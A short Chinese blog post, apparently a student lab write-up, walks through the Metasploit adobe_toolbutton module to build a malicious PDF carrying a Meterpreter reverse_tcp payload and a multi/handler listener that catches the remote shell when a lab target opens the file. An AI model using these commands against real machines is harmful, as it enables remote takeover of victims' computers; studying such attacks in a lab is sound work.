对客户端攻击:adobe_toolbutton
对客户端攻击:adobe_toolbutton
漏洞简介
- 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。
实践过程
- 输入命令
use exploit/windows/fileformat/adobe_toolbutton
使用该模块,然后使用set payload windows/meterpreter/reverse_tcp
设置回连,show options
检查设置信息并补全,最后exploit
生成文件,文件在显示的目录下:
- 建立监听
use exploit/multi/handler
,set payload windows/meterpreter/reverse_tcp
,然后exploit
开启监听,同时在靶机点开pdf:
- 可以看到回连成功
posted on 2017-04-12 17:54 20145208蔡野 阅读(211) 评论(0) 编辑 收藏 举报